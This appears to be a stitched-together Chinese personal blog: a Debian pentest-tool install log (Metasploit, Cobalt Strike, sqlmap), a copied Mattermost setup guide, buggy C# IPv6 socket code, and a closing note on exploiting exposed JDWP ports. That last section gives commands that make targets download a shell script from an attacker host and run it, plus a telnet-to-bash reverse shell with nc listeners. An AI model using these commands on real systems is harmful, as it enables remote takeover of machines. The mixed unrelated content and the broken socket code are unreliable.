1、《鸟哥的私房菜(服务器架设篇)》30%

2、《黑客与画家》完!

3、《史蒂夫·乔布斯传完!

4、《黑客大曝光:Web应用程序安全(原书第三版)》30%

More...

Debian 8.3 Mate 下载地址
http://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/
http://cdimage.debian.org/debian-cd/8.3.0-live/amd64/iso-hybrid/debian-live-8.3.0-amd64-mate-desktop.iso
http://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-8.3.0-amd64-mate-desktop.iso
#Ubuntu Mate ISO http://cdimage.ubuntu.com/ubuntu-mate/releases/15.04/release/ubuntu-mate-15.04-desktop-amd64.iso

 

Debian 安装msf # ruby2.3.1

apt-get install pptp-linux network-manager-pptp build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev git-core postgresql curl nmap libsqlite3-dev default-jdk screen subversion –y   #必要组件

ruby用rvm装吧

$ curl -sSL https://rvm.io/mpapis.asc | gpg --import -
$ \curl -sSL https://get.rvm.io | bash -s stable
# 如果上面的连接失败,可以尝试:
$ curl -L https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
$ source /etc/profile.d/rvm.sh
rvm install ruby-2.3.1
#rvm install ruby-2.1.8
rvm use 2.3.1 --default
gem install bundler

 

apt-get install rubygems-integration rubygems
gem install wirble sqlite3 bundler
###下面各种报错都是国内网络不稳定造成,直接上vpn解决##
#报错Unable to download data from https://rubygems.org/ - Errno::ECONNRESET: Connection reset by peer - SSL_connect,解决如下

wget https://raw.githubusercontent.com/rubygems/rubygems/master/lib/rubygems/ssl_certs/AddTrustExternalCARoot-2048.pem
gem which rubygems
/usr/lib/ruby/2.1.0/rubygems.rb
cp ~/Downloads/AddTrustExternalCARoot-2048.pem /usr/lib/ruby/2.1.0/rubygems/ssl_certs/
gem install wirble sqlite3 bundler

排错:

#when download from https, may has SSL error, then: gem sources --removehttps://rubygems.org; gem sources --addhttp://rubygems.org or bundle config mirror.https://rubygems.org https://ruby.taobao.org
head -1 /path/to/metasploit-framework/Gemfile
source 'http://rubygems.org'

 

设置Postgresql数据库及用户

sudo -s
su postgres
createuser msf -P -S -R -D
Enter password for new role: ***
Enter it again: ***
createdb -O msf msf
exit

cd /opt/; git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml

production:
adapter: postgresql
database: msf
username: msf
password: msf
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5


sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
### sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> ~/.bashrc"
source /etc/profile
安装中文输入法
apt-get install ibus ibus-googlepinyin ibus-sunpinyin

 

安装Armitage

curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
tar -xvzf /tmp/armitage.tgz -C /opt
ln -s /opt/armitage/armitage /usr/local/bin/armitage
ln -s /opt/armitage/teamserver /usr/local/bin/armitage_teamserver
sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

安装CobaltStrike
US代理,获取cobaltstrike

firefox https://www.cobaltstrike.com/download
tar -xvzf /tmp/cobaltstrike.tgz -C /opt
ln -s /opt/cobaltstrike/cobaltstrike /usr/local/bin/cobaltstrike
ln -s /opt/cobaltstrike/teamserver /usr/local/bin/cobaltstrike_teamserver
sh -c "echo java -jar /opt/cobaltstrike/cobaltstrike.jar \$\* > /opt/cobaltstrike/cobaltstrike"
#perl -pi -e 's/cobaltstrike.jar/\/opt\/cobaltstrike\/cobaltstrike.jar/g' /opt/cobaltstrike/teamserver

安装SQLMap

cd /usr/share/; git clone https://github.com/sqlmapproject/sqlmap.git
ln -s /usr/share/sqlmap/sqlmap.py /usr/bin/sqlmap

安装Bettercap

apt-get install build-essential ruby-dev libpcap-dev
gem install bettercap
gem update bettercap

安装 DNSEnum

DNSenum http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz
git clone https://github.com/fwaeytens/dnsenum.git
cd dnsenum/
安装缺失的模块:cpan XXX::xxx

安装 fierce

$ cd /usr/share
$ svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/
$ cd fierce2/
$ perl Makefile.PL
$ make
$ make test
$ make install
$ ln -s /usr/local/bin/fierce /usr/share/fierce2/fierce
$ mkdir -p /pentest/enumeration/fierce/
$ ln -s /usr/local/bin/fierce /pentest/enumeration/fierce/fierce

cpan Net::DNS #安装缺失的库
cpan Net::DNS::Resolver #貌似可以解决报错 improperly terminated AXFR at D:\tools\fierce-0.9.9\fierce.pl line 228.

安装WPScan

Installing on Debian:
sudo apt-get install git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev
cd /usr/share/; git clone https://github.com/wpscanteam/wpscan.git
cd wpscan

gem install bundler && bundle install --without test --path vendor/bundle
alias wpscan='ruby /usr/share/wpscan/wpscan.rb --enumerate u --enumerate p --enumerate t --url '

或者安装Docker后安装Docker的wpscan

docker pull wpscanteam/wpscan
docker run --rm wpscanteam/wpscan -u http://yourblog.com [options]

 

安装PPTP VPN支持

apt-get install network-manager-openvpn network-manager-pptp network-manager-pptp-gnome network-manager-vpnc
service network-manager restart

 

 

安装GuardScan

wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
pip install tornado
#安装个lnmp
apt-get install screen
screen -S lnmp
wget -c http://soft.vpser.net/lnmp/lnmp1.2-full.tar.gz && tar zxf lnmp1.2-full.tar.gz && cd lnmp1.2-full && ./install.sh lnmp
#wget -c http://soft.vpser.net/lnmp/lnmp1.3beta-full.tar.gz && tar zxf lnmp1.3beta-full.tar.gz && cd lnmp1.3beta-full && ./install.sh lnmp

 

mysql

create database pscan;
use pscan;
source pscan.sql
CREATE USER 'pscan'@'%' IDENTIFIED BY 'RFwPauXUhF4sWtSq';GRANT USAGE ON *.* TO 'pscan'@'%' IDENTIFIED BY '***' REQUIRE NONE WITH MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;GRANT ALL PRIVILEGES ON `pscan`.* TO 'pscan'@'%';

修改conn.php中的数据库信息
修改 ./proxy/isqlmap.py
self.webserver="http://localhost:88/"
改成你自己的主机地址和端口。
修改./proxy/task.py
def update():
url="http://localhost:88/api.php?type=sqlmap_update"
urllib2.urlopen(url).read()
def api_get():
url="http://localhost:88/api.php?type=api_get"
data=urllib2.urlopen(url).read()
改成你的host地址


配置
打开 http://localhost:88/config.php 在list里面添加sqlmapapi节点
格式为
http://127.0.0.1:8775 (不需要最后一个/)
浏览器设置代理,并且添加一个http header
User-Hash: youhash


使用
首先运行sqlmapapi,并且在config里面增加至少一个节点
cd proxy/
python proxy_io.py 8080&
python task.py&
然后将浏览器代理设置为
http 127.0.0.1 8080
然后一顿请求之后可以打开
http://localhost:88/config.php

 

仅作记录,呵呵 工具党。

Websocket聊天,不支持xmpp

 

Install Debian Jessie (x64)


1. Set up 3 machines with Debian Jessie with 2GB of RAM or more. The servers will be used for the Load Balancer, Mattermost (this must be x64 to use pre-built binaries), and Database.
2. This can also be set up all on a single server for small teams:• I have a Mattermost instance running on a single Debian Jessie server with 1GB of ram and 30 GB SSD
• This has been working in production for ~20 users without issue.
• The only difference in the below instructions for this method is to do everything on the same server
• Make sure the system is up to date with the most recent security patches.• sudo apt-get update
• sudo apt-get upgrade

Set up Database Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.1
2. Install PostgreSQL 9.3+ (or MySQL 5.6+)• sudo apt-get install postgresql postgresql-contrib
• PostgreSQL created a user account called postgres. You will need to log into that account with:• sudo -i -u postgres
• You can get a PostgreSQL prompt by typing:• psql
• Create the Mattermost database by typing:• postgres=# CREATE DATABASE mattermost;
• Create the Mattermost user by typing:• postgres=# CREATE USER mmuser WITH PASSWORD 'mmuser_password';
• Grant the user access to the Mattermost database by typing:• postgres=# GRANT ALL PRIVILEGES ON DATABASE mattermost to mmuser;
• You can exit out of PostgreSQL by typing:• postgre=# \q
• You can exit the postgres account by typing:• exit
• Allow Postgres to listen on all assigned IP Addresses• sudo vi /etc/postgresql/9.3/main/postgresql.conf
• Uncomment ‘listen_addresses’ and change ‘localhost’ to ‘*’
• Alter pg_hba.conf to allow the mattermost server to talk to the postgres database• sudo vi /etc/postgresql/9.3/main/pg_hba.conf
• Add the following line to the ‘IPv4 local connections’
• host all all 10.10.10.2/32 md5
• Reload Postgres database• sudo /etc/init.d/postgresql reload
• Attempt to connect with the new created user to verify everything looks good• psql --host=10.10.10.1 --dbname=mattermost --username=mmuser --password
• mattermost=> \q

Set up Mattermost Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.1
2. Download the latest Mattermost Server by typing:
• wget https://github.com/mattermost/platform/releases/download/vX.X.X/mattermost.tar.gz
• Where vX.X.X is the latest Mattermost release version. For example, v2.0.0
• Install Mattermost under /opt
• Unzip the Mattermost Server by typing:
• tar -xvzf mattermost.tar.gz
• sudo mv mattermost /opt
• Create the storage directory for files. We assume you will have attached a large drive for storage of images and files. For this setup we will assume the directory is located at /opt/mattermost/data.
• Create the directory by typing:
• sudo mkdir -p /opt/mattermost/data
• Create a system user and group called mattermost that will run this service
• sudo useradd -r mattermost -U
• Set the mattermost account as the directory owner by typing:
• sudo chown -R mattermost:mattermost /opt/mattermost
• sudo chmod -R g+w /opt/mattermost
• Add yourself to the mattermost group to ensure you can edit these files:
• sudo usermod -aG mattermost USERNAME
• Configure Mattermost Server by editing the config.json file at /opt/mattermost/config
• cd /opt/mattermost/config
• Edit the file by typing:
• vi config.json
• replace DriverName": "mysql" with DriverName": "postgres"
• replace "DataSource": "mmuser:[email protected](dockerhost:3306)/mattermost_test?charset=utf8mb4,utf8"with "DataSource": "postgres://mmuser:[email protected]:5432/mattermost?sslmode=disable&connect_timeout=10"• Assuming a default IP address of 10.10.10.1
• Optionally you may continue to edit configuration settings in config.json or use the System Console described in a later section to finish the configuration.
• Test the Mattermost Server
• cd /opt/mattermost/bin
• Run the Mattermost Server by typing:
• ./platform
• You should see a console log like Server is listening on :8065 letting you know the service is running.
• Stop the server for now by typing ctrl-c
• Setup Mattermost to use the systemd init daemon which handles supervision of the Mattermost process
• sudo touch /etc/init.d/mattermost
• sudo vi /etc/init.d/mattermost
• Copy the following lines into /etc/init.d/mattermost


#! /bin/sh
### BEGIN INIT INFO
# Provides: mattermost
# Required-Start: $network $syslog
# Required-Stop: $network $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Mattermost Group Chat
# Description: Mattermost: An open-source Slack
### END INIT INFO
PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="Mattermost"
NAME=mattermost
MATTERMOST_ROOT=/opt/mattermost
MATTERMOST_GROUP=mattermost
MATTERMOST_USER=mattermost
DAEMON="$MATTERMOST_ROOT/bin/platform"
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME
. /lib/lsb/init-functions
do_start() {
# Return
# 0 if daemon has been started
# 1 if daemon was already running
# 2 if daemon could not be started
start-stop-daemon --start --quiet \
--chuid $MATTERMOST_USER:$MATTERMOST_GROUP --chdir $MATTERMOST_ROOT --background \
--pidfile $PIDFILE --exec $DAEMON --test > /dev/null \
|| return 1
start-stop-daemon --start --quiet \
--chuid $MATTERMOST_USER:$MATTERMOST_GROUP --chdir $MATTERMOST_ROOT --background \
--make-pidfile --pidfile $PIDFILE --exec $DAEMON \
|| return 2
}
#
# Function that stops the daemon/service
#
do_stop() {
# Return
# 0 if daemon has been stopped
# 1 if daemon was already stopped
# 2 if daemon could not be stopped
# other if a failure occurred
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile $PIDFILE --exec $DAEMON
RETVAL="$?"
[ "$RETVAL" = 2 ] && return 2
# Wait for children to finish too if this is a daemon that forks
# and if the daemon is only ever run from this initscript.
# If the above conditions are not satisfied then add some other code
# that waits for the process to drop all resources that could be
# needed by services started subsequently. A last resort is to
# sleep for some time.
start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 \
--exec $DAEMON
[ "$?" = 2 ] && return 2
# Many daemons don't delete their pidfiles when they exit.
rm -f $PIDFILE
return "$RETVAL"
}
case "$1" in
start)
[ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME"
do_start
case "$?" in
0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
stop)
[ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME"
do_stop
case "$?" in
0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
status)
status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $?
;;
restart|force-reload)
#
# If the "reload" option is implemented then remove the
# 'force-reload' alias
#
log_daemon_msg "Restarting $DESC" "$NAME"
do_stop
case "$?" in
0|1)
do_start
case "$?" in
0) log_end_msg 0 ;;
1) log_end_msg 1 ;; # Old process is still running
*) log_end_msg 1 ;; # Failed to start
esac
;;
*)
# Failed to stop
log_end_msg 1
;;
esac
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2
exit 3
;;
esac
exit 0


• Make sure that /etc/init.d/mattermost is executable
• sudo chmod +x /etc/init.d/mattermost
• On reboot, systemd will generate a unit file from the headers in this init script and install it in/run/systemd/generator.late/
Note: This setup can also be done using a systemd unit, usable for non-Debian systems, such as Arch Linux. The unit file is as follows:
# cat /etc/systemd/system/mattermost.service


[Unit]
Description=Mattermost
After=network.target
[Service]
User=mattermost
ExecStart=/home/mattermost/mattermost/bin/platform
WorkingDirectory=/home/mattermost/mattermost
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target

# systemctl start mattermost
# systemctl enable mattermost

Set up Nginx Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.3
2. We use Nginx for proxying request to the Mattermost Server. The main benefits are:
• SSL termination
• http to https redirect
• Port mapping :80 to :8065
• Standard request logs
• Install Nginx on Debian with
• sudo apt-get install nginx
• Verify Nginx is running
• curl http://10.10.10.3
• You should see a Welcome to nginx! page
• You can manage Nginx with the following commands
• sudo service nginx stop
• sudo service nginx start
• sudo service nginx restart
• Map a FQDN (fully qualified domain name) like mattermost.example.com to point to the Nginx server.
• Configure Nginx to proxy connections from the internet to the Mattermost Server
• Create a configuration for Mattermost
• sudo touch /etc/nginx/sites-available/mattermost
• Below is a sample configuration with the minimum settings required to configure Mattermost


server {
server_name mattermost.example.com;
location / {
client_max_body_size 50M;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Frame-Options SAMEORIGIN;
proxy_pass http://10.10.10.2:8065;
}
}


• Remove the existing file with
• sudo rm /etc/nginx/sites-enabled/default
• Link the mattermost config by typing:
• sudo ln -s /etc/nginx/sites-available/mattermost /etc/nginx/sites-enabled/mattermost
• Restart Nginx by typing:
• sudo service nginx restart
• Verify you can see Mattermost thru the proxy by typing:
• curl http://localhost
• You should see a page titles Mattermost - Signup

Set up Nginx with SSL (Recommended)


1. You can use a free and an open certificate security like let’s encrypt, this is how to proceed
• sudo apt-get install git
• git clone https://github.com/letsencrypt/letsencrypt
• cd letsencrypt
• Be sure that the port 80 is not use by stopping nginx
• sudo service nginx stop
• netstat -na | grep ':80.*LISTEN'
• ./letsencrypt-auto certonly --standalone
• This command will download packages and run the instance, after that you will have to give your domain name
• You can find your certificate in /etc/letsencrypt/live
• Modify the file at /etc/nginx/sites-available/mattermost and add the following lines:


server {
listen 80;
server_name mattermost.example.com;
return 301 https://$server_name$request_uri;
}
server {
listen 443 ssl;
server_name mattermost.example.com;
ssl on;
ssl_certificate /etc/letsencrypt/live/yourdomainname/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/yourdomainname/privkey.pem;
ssl_session_timeout 5m;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
ssl_prefer_server_ciphers on;
ssl_session_cache shared:SSL:10m;
location / {
gzip off;
proxy_set_header X-Forwarded-Ssl on;
client_max_body_size 50M;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Frame-Options SAMEORIGIN;
proxy_pass http://10.10.10.2:8065;
}
}


• Be sure to restart nginx
• sudo service nginx start
• Add the following line to cron so the cert will renew every month
• crontab -e
• @monthly /home/YOURUSERNAME/letsencrypt/letsencrypt-auto certonly --reinstall -d yourdomainname&& sudo service nginx reload

Finish Mattermost Server setup


1. Navigate to https://mattermost.example.com and create a team and user.
2. The first user in the system is automatically granted the system_admin role, which gives you access to the System Console.
3. From the town-square channel click the dropdown and choose the System Console option
4. Update Email Settings. We recommend using an email sending service. The example below assumes AmazonSES.• Set Send Email Notifications to true
• Set Require Email Verification to true
• Set Feedback Name to No-Reply
• Set Feedback Email to [email protected]
• Set SMTP Username to AFIADTOVDKDLGERR
• Set SMTP Password to DFKJoiweklsjdflkjOIGHLSDFJewiskdjf
• Set SMTP Server to email-smtp.us-east-1.amazonaws.com
• Set SMTP Port to 465
• Set Connection Security to TLS
• Save the Settings
• Update File Settings• Change Local Directory Location from ./data/ to /mattermost/data
• Update Log Settings.• Set Log to The Console to false
• Update Rate Limit Settings.• Set Vary By Remote Address to false
• Set Vary By HTTP Header to X-Real-IP
• Feel free to modify other settings.
• Restart the Mattermost Service by typing:• sudo restart mattermost

http://docs.mattermost.com/install/prod-debian.html

服务端监听代码:

IPAddress dirIP = IPAddress.Parse("fe00:e130:91d4:913b:126c");
IPEndPoint endPoint = new IPEndPoint(dirIP, 55577); 

Socket serverSocket = new Socket(AddressFamily.InterNetworkV6,
                                SocketType.Stream,
                                ProtocolType.Tcp);
try
{
    serverSocket.Bind(endPoint);
    serverSocket.Listen(int.MaxValue);
    StreamReader reader = null;
    StreamWriter writer = null;
    while(true)
    {
        Socket clientSocket = serverSocket.Accpet();
        NetworkStream ntStream = new NetworkStream(clientSocket);
        reader = new StreamReader(ntStream);
        string dataClient = reader.ReadLine();
        Console.WriteLine("Client::"+dataClient);
        if(dataClient == "Quit")
            break;
        writer = new StreamWriter(ntStream);
        string dataServer = "Hello  Clinet,I'm Server!";
        writer.WriteLine(dataServer);
        writer.Flush();
        Console.WriteLine("Server::" + dataServer);
    }
    reader.Close();
    writer.Close();
}
catch(Exception ex)
{
    Console.WriteLine(ex.Message + ex.ToString());
} 

客户端连接代码

IPAddress direction = ("fe00:e130:91d4:913b:126c");
IPEndPoint endPointSrv = new IPEndPoint(direction,55577);
Socket clientSocket = new Socket(AddressFamily.InterNetworkV6,
                                SocketType.Stream,
                                ProtocolType.Tcp);
try
{
    clientSocket.Connect(endPointSrv);
    StreamReader reader = null;
    StreamWriter writer = null;
    NetworkStream ntStream = new NetworkStream(clientSocket);
    writer = new StreamWriter(ntStream);
    string dataClient = "Hello,I'm Client! ";
    writer.WriteLine(dataClient);
    writer.Flush();
    Console.WriteLine("Client 已连接");
    reader = new StreamWriter(ntStream);
    string dataServer = reader.ReadLine();
    Console.WriteLine("Server::" + dataServer);
}
catch(Exception ex)
{
    Console.WriteLine(ex.ToString());
}
reader.Close();
writer.Close(); 

好久没更新博客,一切都因为太忙

偶遇几个JDWP,测试下 漏洞存在所以写个笔记记下

NMAP扫描

image

利用工具: https://github.com/IOActive/jdwp-shellifier

 

image

要触发**.**.**.**.ServerSocket.accept 访问一下web端口就行了

 

此目标的Web端口是8009哦

 

姿势来自

http://www.wooyun.org/bugs/wooyun-2010-095744

增加利用telnet反弹得到shell的方法,以国内某设备为例

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'chmod a+x /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd '/tmp/shell.sh'

shell.txt内容:(需要开2个端口,一个用于发送命令一个用于接受命令返回)

telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333

 

然后在x.x.x.x服务器上用nc监听1111端口和3333端口

1111端口是发送命令,3333回显命令结果的

两个cmd窗口

image

 

nc -nnv -L -p 3333

nc -nnv -L -p 1111